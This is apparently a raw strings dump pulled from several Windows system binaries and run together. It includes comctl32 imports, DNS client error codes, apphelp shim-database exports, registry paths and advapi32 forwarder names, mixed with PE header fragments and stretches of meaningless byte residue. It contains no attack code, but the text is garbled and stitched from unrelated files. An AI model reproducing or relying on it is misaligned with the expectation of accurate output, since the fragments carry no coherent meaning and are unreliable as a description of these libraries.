GetWindowContextHelpId MBToWCSEx AnimateWindow DeleteMenu InsertMenuItemW SendMessageA GetAncestor PeekMessageA EnableMenuItem OemToCharBuffW CharToOemBuffW IsCharLowerW CharUpperBuffW CharLowerBuffW GetCaretPos GetCursorFrameInfo GetWindowTextLengthW DrawFrame DrawStateW GetNextDlgGroupItem GetForegroundWindow ReplyMessage InSendMessage GetUpdateRgn DestroyCursor SetKeyboardState GetKeyboardState WindowFromPoint GetMenu GetWindowRgn SetLayeredWindowAttributes GetCursor InvalidateRgn SetParent ChildWindowFromPoint TabbedTextOutW DragDetect WCSToMBEx ScrollDC TrackPopupMenu AppendMenuW CreatePopupMenu GetClassInfoW SetMessageExtraInfo ValidateRect GetShellWindow GetProcessDefaultLayout FillRect OemKeyScan VkKeyScanW BlockInput MonitorFromRect CallNextHookEx SetWindowsHookExW UnhookWindowsHookEx IsProcessDPIAware CreateWindowExW CreateDialogIndirectParamW DialogBoxIndirectParamW RegisterClassExW GetClassInfoExW LoadBitmapW GetScrollBarInfo CreateIconIndirect DestroyIcon UnregisterClassW RegisterClassW SubtractRect GetMenuState GetDlgItem ShowWindow SetMenu CheckMenuItem GetSystemMenu GetSubMenu GetMenuItemInfoW LoadStringW GetMenuItemCount GetMenuItemID SetScrollInfo SetScrollRange SetScrollPos EnableScrollBar ShowScrollBar GetScrollInfo GetScrollRange GetScrollPos RegisterWindowMessageW LoadIconW ClientToScreen DrawIcon PeekMessageW TranslateMessage DispatchMessageW WaitMessage SetCursor SetCursorPos SendNotifyMessageW CallWindowProcW GetWindowThreadProcessId GetPropW TrackMouseEvent IsWindowVisible RemovePropW SetPropW SetTimer GetCursorPos ReleaseCapture KillTimer SetCapture SetFocus GetCaretBlinkTime GetClassNameW GetCapture GetParent SetWindowTextW GetWindowTextW IsWindowEnabled SetWindowPos UnionRect MapWindowPoints MoveWindow GetWindow LoadCursorW GetWindowRect ScreenToClient DefWindowProcW IsWindow DestroyWindow GetIconInfo NotifyWinEvent InvalidateRect UpdateWindow BeginPaint GetDlgCtrlID DrawFrameControl EndPaint PtInRect SetRect InflateRect DrawEdge DrawIconEx CreateWindowExA RedrawWindow GetClientRect IsZoomed GetDC ReleaseDC SendMessageW GetSysColor GetSystemMetrics SetWindowLongW GetWindowLongW CharLowerW HideCaret GrayStringW SetCaretPos ShowCaret GetSysColorBrush MapVirtualKeyW GetKeyNameTextW EnableWindow GetClassLongW GetFocus GetKeyState IsClipboardFormatAvailable GetClipboardData MessageBeep OpenClipboard EmptyClipboard SetClipboardData SendInput CloseClipboard GetWindowRgnBox SetWindowRgn DrawFocusRect SetUnhandledExceptionFilter CreateActCtxW GetSystemWindowsDirectoryW TlsGetValue AddAtomW DeleteAtom GetAtomNameW GetVersion TlsFree TlsAlloc TlsSetValue SetProcessWorkingSetSize FindAtomW GetSystemDirectoryW FreeLibraryAndExitThread CreateThread GetModuleHandleExW OutputDebugStringA InitializeCriticalSectionAndSpinCount GetModuleFileNameA VirtualQueryEx DebugBreak GetThreadUILanguage OutputDebugStringW GetSystemTimeAsFileTime FormatMessageW GetCalendarSupportedDateRange GetCalendarWeekNumber GetCalendarDifferenceInDays AdjustCalendarDate GetSystemDefaultLCID LCIDToLocaleName EnumCalendarInfoExEx GetLocalTime ConvertSystemTimeToCalDateTime GetSystemTime GetTimeFormatW IsValidCalDateTime UnmapViewOfFile CreateFileW GetFileSize CreateFileMappingW MapViewOfFile ConvertNLSDayOfWeekToWin32DayOfWeek GetCalendarDateFormat ConvertCalDateTimeToSystemTime GetCalendarDaysInMonth UpdateCalendarDayOfWeek GetCalendarMonthsInYear GetUserDefaultLCID GetCalendarInfoW FindFirstFileW FindNextFileW FindClose GetLogicalDrives UnhandledExceptionFilter VirtualQuery IsDBCSLeadByteEx GetStringTypeW SystemTimeToFileTime LocalSize Sleep GetCPInfo LocalUnlock LocalLock ConvertDefaultLocale IsValidLocale SetLastError CloseHandle WerpNotifyUseStringResource GetModuleFileNameW GlobalReAlloc IsProcessorFeaturePresent InitOnceExecuteOnce EnterCriticalSection LeaveCriticalSection HeapSize ReleaseActCtx FindResourceExA GetThreadLocale GetCurrentActCtx LoadLibraryW GetUserDefaultUILanguage FindResourceExW EnumResourceLanguagesW InterlockedIncrement SizeofResource InterlockedDecrement DeactivateActCtx ActivateActCtx FindResourceW LoadResource LockResource FreeResource InterlockedExchange GetModuleHandleW MulDiv GlobalFlags GlobalAlloc GlobalLock GlobalUnlock GlobalFree CompareStringW lstrcmpW IsDBCSLeadByte HeapReAlloc lstrcmpA LocalAlloc LocalFree AcquireSRWLockExclusive ReleaseSRWLockExclusive DeleteCriticalSection InitializeCriticalSection GetACP LoadLibraryExW GlobalAddAtomW LocalReAlloc GetNumberFormatW GetLocaleInfoW GetTickCount lstrlenA MultiByteToWideChar WideCharToMultiByte lstrlenW lstrcmpiA lstrcmpiW LoadLibraryExA InterlockedCompareExchange FreeLibrary GetLastError GetProcAddress DelayLoadFailureHook DisableThreadLibraryCalls HeapFree GetProcessHeap QueryPerformanceCounter HeapAlloc y:U5 RSDS7 comctl32.pdb urt3 at}Djt 0jts [vrtpvrtFvrt ityf`t& vrt1vrt et:?`t0?`t0 dtnBdt$ `dtt dtt$dttVdttLdtt vrt} vrtBdtt8dtt.dttuBdt Tstt rttmrtt ogtXrtt et#sgt rtt& rttP stte et*stt et?stt9 0A0C0E0G0I0c0 < = b'c'V : F ~ 9 E } !This program cannot be run in DOS mode. J"Rich .text `.data .rsrc @.reloc ntdll.dll WS2_32.dll WSHTCPIP.dll WSHAddressToString WSHEnumProtocols WSHGetBroadcastSockaddr WSHGetProviderGuid WSHGetSockaddrType WSHGetSocketInformation WSHGetWSAProtocolInfo WSHGetWildcardSockaddr WSHGetWinsockMapping WSHIoctl WSHJoinLeaf WSHNotify WSHOpenSocket WSHOpenSocket2 WSHSetSocketInformation WSHStringToAddress SVtO r' !This program cannot be run in DOS mode. vd2JvlJ vd2\vfJ vd2LvjJ vd2MvlJ vd2[veJ vd2KvlJ vd2NvlJ vRichmJ .text `.data .rsrc @.reloc KERNEL32.dll msvcrt.dll ntdll.dll uw%-qw Eqws qwfqsw/ vwtNrw Y__^[ VW9E @_^[] VERSION.dll GetFileVersionInfoA GetFileVersionInfoByHandle GetFileVersionInfoExW GetFileVersionInfoSizeA GetFileVersionInfoSizeExW GetFileVersionInfoSizeW GetFileVersionInfoW VerFindFileA VerFindFileW VerInstallFileA VerInstallFileW VerLanguageNameA VerLanguageNameW VerQueryValueA VerQueryValueW KERNEL32.VerLanguageNameA KERNEL32.VerLanguageNameW 0@@f @_^[ wCV3 f91t AAJu 0FE2Xf FE2X _[^] t+9u VVVh VVVj FE2X PjVWj s$RP _^[] F<9} 9} t 9}(t _^u [f9^ _^[] @;_(r _^[] vLSV @;G(r QQS3 Wf9M _^[] PVSSW tj6j QSVW3 |0SVW SVWj t^[=H 9^(v @;^(r 9^(v6 u6SSS @;F(r WWWS Qj WPW _^[] GetAdaptersAddresses [_^] u 9} VW9E @_^[] u 9u t9=d t^[9= tt}9= ttu9=d ttm3 tu j @^[_] tPPj dnslib Wjd3 WWWWWP FH9} thX1 _^[] QQSV3 W@PV @@f; tQRPh tRRS tQRPhXu VVVV u}SVh ^[h@ WWWW SVW3 www.msdn.com msdn.com www.msn.com msn.com go.microsoft.com msdn.microsoft.com office.microsoft.com microsoftupdate.microsoft.com wustats.microsoft.com support.microsoft.com www.microsoft.com microsoft.com update.microsoft.com download.microsoft.com microsoftupdate.com windowsupdate.com windowsupdate.microsoft.com j.Yf9 wYt\ ^HSj SVW3 jWX_^[ WWWW tSSPV SVh\ VSh\ VRQWh\ WSQh tVPh tVSj t(WSj VSj% VSj& PVSj' Dns_RecvTcp - recv() of TCP message failed. socket = %d %d bytes recvd %d bytes left GetLastError = 0x%08lx. WSAEMFILE WSAEINVAL WSAEFAULT WSAEACCES WSAEBADF WSAEINTR ERROR_NOT_READY ERROR_INVALID_SECURITY_DESCR ERROR_NET_WRITE_FAULT ERROR_FILE_EXISTS ERROR_NETNAME_DELETED ERROR_DUP_NAME ERROR_REM_NOT_LIST ERROR_HANDLE_DISK_FULL ERROR_WRITE_PROTECT ERROR_INVALID_DRIVE ERROR_INVALID_ACCESS ERROR_PATH_NOT_FOUND RPC_S_SEC_PKG_ERROR RPC_S_CALL_CANCELLED EPT_S_NOT_REGISTERED RPC_S_INVALID_NET_ADDR RPC_S_SERVER_UNAVAILABLE ERROR_TIMEOUT ERROR_FILE_INVALID ERROR_INVALID_FLAGS ERROR_MORE_DATA ERROR_LOCKED ERROR_ALREADY_EXISTS ERROR_BUSY ERROR_BAD_ARGUMENTS ERROR_INVALID_PARAMETER ERROR_NOT_SUPPORTED ERROR_SHARING_VIOLATION ERROR_OUTOFMEMORY ERROR_BAD_FORMAT ERROR_NOT_ENOUGH_MEMORY ERROR_ACCESS_DENIED ERROR_FILE_NOT_FOUND DNS_ERROR_DP_FSMO_ERROR DNS_ERROR_DP_NOT_AVAILABLE DNS_ERROR_DP_ALREADY_ENLISTED DNS_ERROR_DP_NOT_ENLISTED DNS_ERROR_DP_ALREADY_EXISTS DNS_ERROR_DP_DOES_NOT_EXIST DNS_ERROR_NO_DNS_SERVERS DNS_ERROR_NO_TCPIP DNS_STATUS_CONTINUE_NEEDED DNS_INFO_ADDED_LOCAL_WINS DNS_ERROR_AXFR DNS_INFO_AXFR_COMPLETE DNS_ERROR_DNAME_COLLISION DNS_ERROR_NODE_IS_DNAME ERROR_DS_COULDNT_CONTACT_FSMO DNS_ERROR_DS_ZONE_ALREADY_EXISTS DNS_ERROR_DS_UNAVAILABLE DNS_WARNING_DOMAIN_UNDELETED DNS_WARNING_PTR_CREATE_FAILED DNS_ERROR_NAME_DOES_NOT_EXIST DNS_ERROR_NO_CREATE_CACHE_DATA DNS_ERROR_SECONDARY_DATA DNS_ERROR_RECORD_ALREADY_EXISTS DNS_ERROR_RECORD_ONLY_AT_ZONE_ROOT DNS_ERROR_CNAME_COLLISION DNS_ERROR_NODE_IS_CNAME DNS_ERROR_ALIAS_LOOP DNS_ERROR_CNAME_LOOP DNS_ERROR_NAME_NOT_IN_ZONE DNS_ERROR_RECORD_TIMED_OUT DNS_ERROR_UNKNOWN_RECORD_TYPE DNS_ERROR_NODE_CREATION_FAILED DNS_ERROR_RECORD_FORMAT DNS_ERROR_RECORD_DOES_NOT_EXIST DNS_ERROR_DATAFILE_PARSING DNS_ERROR_FILE_WRITEBACK_FAILED DNS_ERROR_DATAFILE_OPEN_FAILURE DNS_ERROR_INVALID_DATAFILE_NAME DNS_ERROR_PRIMARY_REQUIRES_DATAFILE DNS_ERROR_FORWARDER_ALREADY_EXISTS DNS_ERROR_SOA_DELETE_INVALID DNS_ERROR_NBSTAT_INIT_FAILED DNS_ERROR_NEED_WINS_SERVERS DNS_ERROR_WINS_INIT_FAILED DNS_ERROR_NEED_SECONDARY_ADDRESSES DNS_ERROR_ZONE_NOT_SECONDARY DNS_ERROR_ZONE_IS_SHUTDOWN DNS_ERROR_ZONE_REQUIRES_MASTER_IP DNS_ERROR_SECONDARY_REQUIRES_MASTER_IP DNS_ERROR_INVALID_ZONE_TYPE DNS_ERROR_AUTOZONE_ALREADY_EXISTS DNS_ERROR_ZONE_ALREADY_EXISTS DNS_ERROR_ZONE_CREATION_FAILED DNS_ERROR_ZONE_LOCKED DNS_ERROR_ZONE_HAS_NO_NS_RECORDS DNS_ERROR_ZONE_HAS_NO_SOA_RECORD DNS_ERROR_ZONE_CONFIGURATION_ERROR DNS_ERROR_INVALID_ZONE_OPERATION DNS_ERROR_NO_ZONE_INFO DNS_ERROR_ZONE_DOES_NOT_EXIST DNS_ERROR_DELEGATION_REQUIRED DNS_ERROR_NOT_ALLOWED_ON_ROOT_SERVER DNS_ERROR_NOT_ALLOWED_ON_RODC DNS_ERROR_DWORD_VALUE_TOO_LARGE DNS_ERROR_DWORD_VALUE_TOO_SMALL DNS_ERROR_INCONSISTENT_ROOT_HINTS DNS_ERROR_CANNOT_FIND_ROOT_HINTS DNS_ERROR_NUMERIC_NAME DNS_ERROR_INVALID_NAME_CHAR DNS_STATUS_SINGLE_PART_NAME DNS_STATUS_DOTTED_NAME DNS_STATUS_FQDN DNS_ERROR_NON_RFC_NAME DNS_ERROR_NOT_UNIQUE DNS_ERROR_TRY_AGAIN_LATER DNS_ERROR_INVALID_PROPERTY DNS_ERROR_INVALID_IP_ADDRESS DNS_ERROR_NOT_ALLOWED_UNDER_DNAME DNS_ERROR_NOT_ALLOWED_UNDER_DELEGATION ERROR_INVALID_TYPE ERROR_INVALID_DATA ERROR_INVALID_NAME DNS_ERROR_UNSECURE_PACKET DNS_ERROR_RCODE DNS_ERROR_NO_PACKET DNS_ERROR_BAD_PACKET DNS_INFO_NO_RECORDS RCODE_BADTIME RCODE_BADKEY RCODE_BADSIG RCODE_NOTZONE RCODE_NOTAUTH RCODE_NXRRSET RCODE_YXRRSET RCODE_YXDOMAIN RCODE_REFUSED RCODE_NOT_IMPLEMENTED RCODE_NAME_ERROR RCODE_SERVER_FAILURE RCODE_FORMAT_ERROR ERROR_SUCCESS E Pj u(VQRP M QP WVPQj ^[_] ^_[] PhJ< Ph:= IPHLPAPI.DLL API-MS-Win-Security-LSALookup-L1-1-0.dll API-MS-WIN-Service-Management-L1-1-0.dll API-MS-WIN-Service-Management-L2-1-0.dll API-MS-WIN-Service-winsvc-L1-1-0.dll RPCRT4.dll CRYPTBASE.dll GetBestInterfaceEx ParseNetworkString GetBestRoute2 GetIpInterfaceEntry GetCurrentThreadCompartmentId LsaLookupGetDomainInfo LsaLookupFreeMemory LsaLookupClose LsaLookupOpenLocalPolicy CloseServiceHandle OpenSCManagerW StartServiceW OpenServiceW NotifyServiceStatusChangeW ControlService QueryServiceStatus UuidCreate I_RpcExceptionFilter RpcStringBindingComposeW RpcBindingFromStringBindingW UuidCreateSequential NdrClientCall2 RpcStringFreeW RpcBindingFree SystemFunction036 API-MS-Win-Core-Localization-L1-1-0.dll API-MS-Win-Core-Debug-L1-1-0.dll KERNELBASE.dll API-MS-Win-Core-DelayLoad-L1-1-0.dll NSI.dll ntdll.dll WS2_32.dll API-MS-Win-Core-Synch-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Core-String-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-ProcessEnvironment-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-Handle-L1-1-0.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll msvcrt.dll free malloc _XcptFilter _initterm towlower _except_handler4_common wcschr wcstoul atoi sscanf _strlwr strtoul strncmp _strupr _amsg_exit memcpy _stricmp rand srand _strnicmp _wcsnicmp _wcsicmp fputs time localtime fprintf fgets rewind fopen strpbrk fclose _vsnwprintf _vsnprintf memset SetLastError GetLastError UnhandledExceptionFilter SetUnhandledExceptionFilter CloseHandle InterlockedDecrement InterlockedCompareExchange InterlockedExchange InterlockedIncrement GetProcAddress FreeLibrary LoadLibraryExW DisableThreadLibraryCalls GetModuleFileNameW GetModuleHandleW LoadLibraryExA RegEnumKeyExW RegCloseKey RegOpenKeyExW RegDeleteKeyExW RegSetValueExW RegQueryValueExW RegCreateKeyExW LocalReAlloc Sleep LocalAlloc LocalFree GetEnvironmentVariableW CreateThread GetCurrentProcess TerminateProcess GetCurrentProcessId GetCurrentThreadId QueryPerformanceCounter MultiByteToWideChar WideCharToMultiByte CompareStringW GetSystemTimeAsFileTime GetVersionExW GetTickCount GetSystemDirectoryA GetTickCount64 ReleaseMutex AcquireSRWLockShared CreateEventA InitializeCriticalSection ReleaseSRWLockShared InitializeSRWLock AcquireSRWLockExclusive ReleaseSRWLockExclusive SleepEx ReleaseSemaphore CreateEventW CreateSemaphoreExW WaitForMultipleObjectsEx WaitForSingleObject SetEvent LeaveCriticalSection EnterCriticalSection DeleteCriticalSection WSAIoctl WSAJoinLeaf GetAddrInfoW FreeAddrInfoW WSASocketW RtlIpv6StringToAddressW RtlIpv4StringToAddressW WinSqmIsOptedIn WinSqmSetDWORD EtwLogTraceEvent EtwEventEnabled EtwEventWrite EvtIntReportEventAndSourceAsync EtwEventRegister EtwEventUnregister EtwUnregisterTraceGuids EtwRegisterTraceGuidsW EtwGetTraceLoggerHandle EtwGetTraceEnableLevel EtwGetTraceEnableFlags RtlInitializeCriticalSection EtwTraceMessage RtlIpv6StringToAddressA RtlIpv4StringToAddressA RtlIpv6AddressToStringA RtlIpv6StringToAddressExA RtlIpv6StringToAddressExW RtlDeleteCriticalSection RtlDestroyHeap RtlAllocateHeap RtlReAllocateHeap RtlFreeHeap RtlCreateHeap NsiAllocateAndGetTable NsiGetParameter NsiFreeTable DelayLoadFailureHook CompareStringA OutputDebugStringA LCMapStringW RSDS dnsapi.pdb R}w! CRIM WEVT CHAN MAPS VMAP\ 0VMAP$ TTBL TEMP TEMP TEMP$ TEMP( TEMPD TEMP` !This program cannot be run in DOS mode. Rich .text `SANONTCP `.data .rsrc @.reloc Ppw{8qw Bqwq qw/Tqw %s:%s QQS3 XW8] t 8] uu"j _^8] uhXa u.f9H u(f9H u"f9H SanTcpBypass SanRecvPollCount Ph`^ SanResizeDisable SSSS SVW3 9=lk 9=\s 9=Ts trWWhTs _@^] @0Wj u_^] Shhl PSShPl SystemSetupInProgress System\Setup uSV3 tYhXa PVVhC WVVhC QVVP x$u QVVj WVVj AfdSwOpenPacket QPPP QPPP QPPP QPPP PPj QPPP PPPPh QPPP PPPPh QPPP j_u =_ufR^u3S^u2B_u B_u]7_u k|^ufR^u3S^u 8_ui vD_uwy^u5>_u <_uT fR^u3S^u2B_u_C_u 8_u k|^ufR^u3S^ur?_u :_uID_u n\^u-<^u);^u P^uI{^uNH_u#3^u -^uY;^u S^uwJ_u J_u'F_u ^uYI_u 2L_uI{^uNH_u#3^u G_u; -^u%H_u S^uwJ_uVK_u 0^^u !This program cannot be run in DOS mode. dRich 0Z2V .text `.data .rsrc @.reloc B^[2V 0[2V* 1[2V7 ntdll.dll KERNEL32.dll API-MS-Win-Security-Base-L1-1-0.dll qwtNrw7 rwNVrw pwZppw pwM mw -qwg rpwB .qw5 pw'Wqw qwEWqw zP2V apphelp.dll AllowPermLayer ApphelpCheckExe ApphelpCheckIME ApphelpCheckInstallShieldPackage ApphelpCheckModule ApphelpCheckMsiPackage ApphelpCheckRunApp ApphelpCheckRunAppEx ApphelpCheckShellObject ApphelpCreateAppcompatData ApphelpFixMsiPackage ApphelpFixMsiPackageExe ApphelpFreeFileAttributes ApphelpGetFileAttributes ApphelpGetMsiProperties ApphelpGetNTVDMInfo ApphelpGetShimDebugLevel ApphelpParseModuleData ApphelpQueryModuleData ApphelpQueryModuleDataEx ApphelpShowDialog ApphelpUpdateCacheEntry GetPermLayers SE_DllLoaded SE_DllUnloaded SE_DynamicShim SE_GetHookAPIs SE_GetMaxShimCount SE_GetProcAddressIgnoreIncExc SE_GetProcAddressLoad SE_GetShimCount SE_InstallAfterInit SE_InstallBeforeInit SE_IsShimDll SE_LdrEntryRemoved SE_ProcessDying SdbAddLayerTagRefToQuery SdbApphelpNotify SdbApphelpNotifyEx SdbApphelpNotifyEx2 SdbBeginWriteListTag SdbBuildCompatEnvVariables SdbCloseApphelpInformation SdbCloseDatabase SdbCloseDatabaseWrite SdbCloseLocalDatabase SdbCommitIndexes SdbCreateDatabase SdbCreateHelpCenterURL SdbCreateMsiTransformFile SdbDeclareIndex SdbDeletePermLayerKeys SdbDumpSearchPathPartCaches SdbEndWriteListTag SdbEnumMsiTransforms SdbEscapeApphelpURL SdbFindCustomActionForPackage SdbFindFirstDWORDIndexedTag SdbFindFirstGUIDIndexedTag SdbFindFirstMsiPackage SdbFindFirstMsiPackage_Str SdbFindFirstNamedTag SdbFindFirstStringIndexedTag SdbFindFirstTag SdbFindFirstTagRef SdbFindMsiPackageByID SdbFindNextDWORDIndexedTag SdbFindNextGUIDIndexedTag SdbFindNextMsiPackage SdbFindNextStringIndexedTag SdbFindNextTag SdbFindNextTagRef SdbFormatAttribute SdbFreeDatabaseInformation SdbFreeFileAttributes SdbFreeFileInfo SdbFreeFlagInfo SdbGUIDFromString SdbGUIDToString SdbGetAppCompatDataSize SdbGetAppPatchDir SdbGetBinaryTagData SdbGetDatabaseGUID SdbGetDatabaseID SdbGetDatabaseInformation SdbGetDatabaseInformationByName SdbGetDatabaseMatch SdbGetDatabaseVersion SdbGetDllPath SdbGetEntryFlags SdbGetFileAttributes SdbGetFileImageType SdbGetFileImageTypeEx SdbGetFileInfo SdbGetFirstChild SdbGetImageType SdbGetIndex SdbGetItemFromItemRef SdbGetLayerName SdbGetLayerTagRef SdbGetLocalPDB SdbGetMatchingExe SdbGetMsiPackageInformation SdbGetNamedLayer SdbGetNextChild SdbGetNthUserSdb SdbGetPDBFromGUID SdbGetPermLayerKeys SdbGetShowDebugInfoOption SdbGetShowDebugInfoOptionValue SdbGetStandardDatabaseGUID SdbGetStringTagPtr SdbGetTagDataSize SdbGetTagFromTagID SdbGrabMatchingInfo SdbGrabMatchingInfoEx SdbInitDatabase SdbInitDatabaseEx SdbIsNullGUID SdbIsStandardDatabase SdbIsTagrefFromLocalDB SdbIsTagrefFromMainDB SdbLoadString SdbMakeIndexKeyFromString SdbOpenApphelpDetailsDatabase SdbOpenApphelpDetailsDatabaseSP SdbOpenApphelpInformation SdbOpenApphelpInformationByID SdbOpenApphelpResourceFile SdbOpenDatabase SdbOpenDbFromGuid SdbOpenLocalDatabase SdbPackAppCompatData SdbQueryApphelpInformation SdbQueryBlockUpgrade SdbQueryContext SdbQueryData SdbQueryDataEx SdbQueryDataExTagID SdbQueryFlagInfo SdbQueryFlagMask SdbQueryName SdbQueryReinstallUpgrade SdbReadApphelpData SdbReadApphelpDetailsData SdbReadBYTETag SdbReadBYTETagRef SdbReadBinaryTag SdbReadDWORDTag SdbReadDWORDTagRef SdbReadEntryInformation SdbReadMsiTransformInfo SdbReadPatchBits SdbReadQWORDTag SdbReadQWORDTagRef SdbReadStringTag SdbReadStringTagRef SdbReadWORDTag SdbReadWORDTagRef SdbRegisterDatabase SdbRegisterDatabaseEx SdbReleaseDatabase SdbReleaseMatchingExe SdbResolveDatabase SdbSetApphelpDebugParameters SdbSetEntryFlags SdbSetImageType SdbSetPermLayerKeys SdbShowApphelpDialog SdbShowApphelpFromQuery SdbStartIndexing SdbStopIndexing SdbStringDuplicate SdbStringReplace SdbStringReplaceArray SdbTagIDToTagRef SdbTagRefToTagID SdbTagToString SdbUnpackAppCompatData SdbUnregisterDatabase SdbWriteBYTETag SdbWriteBinaryTag SdbWriteBinaryTagFromFile SdbWriteDWORDTag SdbWriteNULLTag SdbWriteQWORDTag SdbWriteStringRefTag SdbWriteStringTag SdbWriteStringTagDirect SdbWriteWORDTag SetPermLayerState SetPermLayers ShimDbgPrint ShimDumpCache ShimFlushCache 90u&d @0Wj 98uI3 d+au9E ApphelpCreateAppcompatData Y__^[ 0@@f duSP duSP jPPf |rht au9u duC3 @0Sj SVW3 au=# @0Vj uhSS j0WV _^[] SVW3 V$9E 0 x VVPS @_^[ QQSV3 No version info. Pulled out a non-stringtable item. No stringtable in DB. TagID 0x%08X, Tag %04X not BINARY type. READDATATAG TagID 0x%X, Tag 0x%X not of the expected type. READTYPETAGREF Error getting StringRef. Failed to convert tag 0x%x to tagid User Info Fail Warn Retrieved flags for this app 0x%x. Failed to read TAG_EXE_ID for tiExe 0x%x ! No DATABASE tag found. LM-SYSTEM \REGISTRY\MACHINE\System LM-HARDWARE \REGISTRY\MACHINE\Hardware \REGISTRY\MACHINE\Software\Wow6432Node\ODBC LM-SW-ODBC \REGISTRY\MACHINE\Software\ODBC \REGISTRY\MACHINE\Software\Wow6432Node\Classes LM-SW-CLASSES \REGISTRY\MACHINE\Software\Classes \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft LM-SW-MS \REGISTRY\MACHINE\Software\Microsoft \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion LM-SW-MS-NT-CV \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion LM-SW-POL-MS \REGISTRY\MACHINE\Software\Policies\Microsoft u%9= hdacuhDacuj DacuS Ph0acuS dut"h acuVj `cuVj `cuS dut"h `cuVj `cuVj Pht`cuS A 9= dut"hT`cuVj h$`cuVj \REGISTRY\USER ,]cu \cuX\cuL\cu \cuL\cu [cu\[cu [cu@[cu4[cu SVW3 tn9u ti9] SVW3 t&9] ^//q ,@ ` r99K f33U x<>Bq j55_ P((x Z--w P`00 gg}V++ jL&&Zl66A~?? \h44 Sb11?* eF##^ iN'' tX,,.4 RRMv;;a {R))> q^// `@ Kr99 MMUf33 PPDx<< Hp88 cB!!0 DD9. ~~Gz== ]]+2 fD""~T** Vd22Nt:: lH$$ Yn77 xxoJ%%r\..$8 tt!> ppB|>> aa_j55 UUxP((z wZ-- 0P`0 g+}V+ &jL&6Zl6?A~? 4\h4 1Sb1 #eF# 'iN' ,tX, R;Mv; ){R) /q^/ `@ 9Kr9J M3Uf3 PB|> a5_j5W U(xP( -wZ- 00P` ++}V =&&jL66Zl??A~ 44\h 11Sb ##eF ''iN ,,tX -6nn ;;Mv })){R //q^ `@ g99KrJJ 33Uf <KK >>B| 55_jWW 3"ii ((xP )--wZ :,c|w{ 9JLX ~=d] j0Z_^ t8Vh exuj xu=@ exuj h\fxu _^[] xuh QRPh QRPh API-MS-Win-Security-LSALookup-L1-1-0.dll API-MS-Win-Security-SDDL-L1-1-0.dll SspiCli.dll RPCRT4.dll LookupAccountSidLocalW ConvertSidToStringSidW ConvertStringSecurityDescriptorToSecurityDescriptorW GetUserNameExW RpcRevertToSelf API-MS-Win-Core-DelayLoad-L1-1-0.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-SysInfo-L1-1-0.dll API-MS-Win-Core-String-L1-1-0.dll API-MS-Win-Core-Profile-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-Misc-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll API-MS-Win-Core-LibraryLoader-L1-1-0.dll API-MS-Win-Core-Interlocked-L1-1-0.dll API-MS-Win-Core-Heap-L1-1-0.dll API-MS-Win-Core-Handle-L1-1-0.dll API-MS-Win-Core-File-L1-1-0.dll API-MS-Win-Core-ErrorHandling-L1-1-0.dll KERNELBASE.dll ntdll.dll msvcrt.dll wcsstr _vsnwprintf _except_handler4_common memset _XcptFilter malloc free _initterm _amsg_exit EtwGetTraceEnableFlags EtwGetTraceEnableLevel EtwGetTraceLoggerHandle EtwRegisterTraceGuidsW EtwUnregisterTraceGuids EtwTraceMessage RtlNtStatusToDosError RtlExpandEnvironmentStrings RtlQueryEnvironmentVariable RtlAdjustPrivilege RtlCreateEnvironment RtlSetEnvironmentVar RtlDestroyEnvironment BemFreeContract BemCreateContractFrom UnhandledExceptionFilter SetUnhandledExceptionFilter GetLastError CreateDirectoryW GetShortPathNameW WriteFile GetFileAttributesW FindFirstFileW ReadFile FindNextFileW FindClose SetFileAttributesW CreateFileW CloseHandle HeapAlloc HeapReAlloc HeapFree GetProcessHeap InterlockedExchange InterlockedCompareExchange DisableThreadLibraryCalls FreeLibrary LoadLibraryExA GetProcAddress RegOpenKeyExW RegQueryInfoKeyW RegQueryValueExW RegEnumKeyExW RegSetKeySecurity RegSetValueExW RegEnumValueW RegCreateKeyExW RegLoadKeyW RegCloseKey Sleep lstrlenW LocalFree OpenProcessToken TerminateProcess GetCurrentProcessId GetCurrentThreadId SetThreadToken GetCurrentThread OpenThreadToken GetCurrentProcess QueryPerformanceCounter CompareStringOrdinal GetComputerNameExW GetSystemTimeAsFileTime GetTickCount IsWellKnownSid ImpersonateSelf CopySid GetTokenInformation ImpersonateLoggedOnUser PrivilegeCheck RevertToSelf GetLengthSid DelayLoadFailureHook RSDS profapi.pdb Sixu 5xukixu #5xu $xut$xuL$xu $xu #xud#xuD#xu !This program cannot be run in DOS mode. Rich .text `.rsrc RSDS77] # s] api-ms-win-downlevel-advapi32-l1-1-0.pdb api-ms-win-downlevel-advapi32-l1-1-0.dll AccessCheck advapi32.AccessCheck AccessCheckAndAuditAlarmW advapi32.AccessCheckAndAuditAlarmW AccessCheckByType advapi32.AccessCheckByType AccessCheckByTypeAndAuditAlarmW advapi32.AccessCheckByTypeAndAuditAlarmW AccessCheckByTypeResultList advapi32.AccessCheckByTypeResultList AccessCheckByTypeResultListAndAuditAlarmByHandleW advapi32.AccessCheckByTypeResultListAndAuditAlarmByHandleW AccessCheckByTypeResultListAndAuditAlarmW advapi32.AccessCheckByTypeResultListAndAuditAlarmW AddAccessAllowedAce advapi32.AddAccessAllowedAce AddAccessAllowedAceEx advapi32.AddAccessAllowedAceEx AddAccessAllowedObjectAce advapi32.AddAccessAllowedObjectAce AddAccessDeniedAce advapi32.AddAccessDeniedAce AddAccessDeniedAceEx advapi32.AddAccessDeniedAceEx AddAccessDeniedObjectAce advapi32.AddAccessDeniedObjectAce AddAce advapi32.AddAce AddAuditAccessAce advapi32.AddAuditAccessAce AddAuditAccessAceEx advapi32.AddAuditAccessAceEx AddAuditAccessObjectAce advapi32.AddAuditAccessObjectAce AddMandatoryAce advapi32.AddMandatoryAce AdjustTokenGroups advapi32.AdjustTokenGroups AdjustTokenPrivileges advapi32.AdjustTokenPrivileges AllocateAndInitializeSid 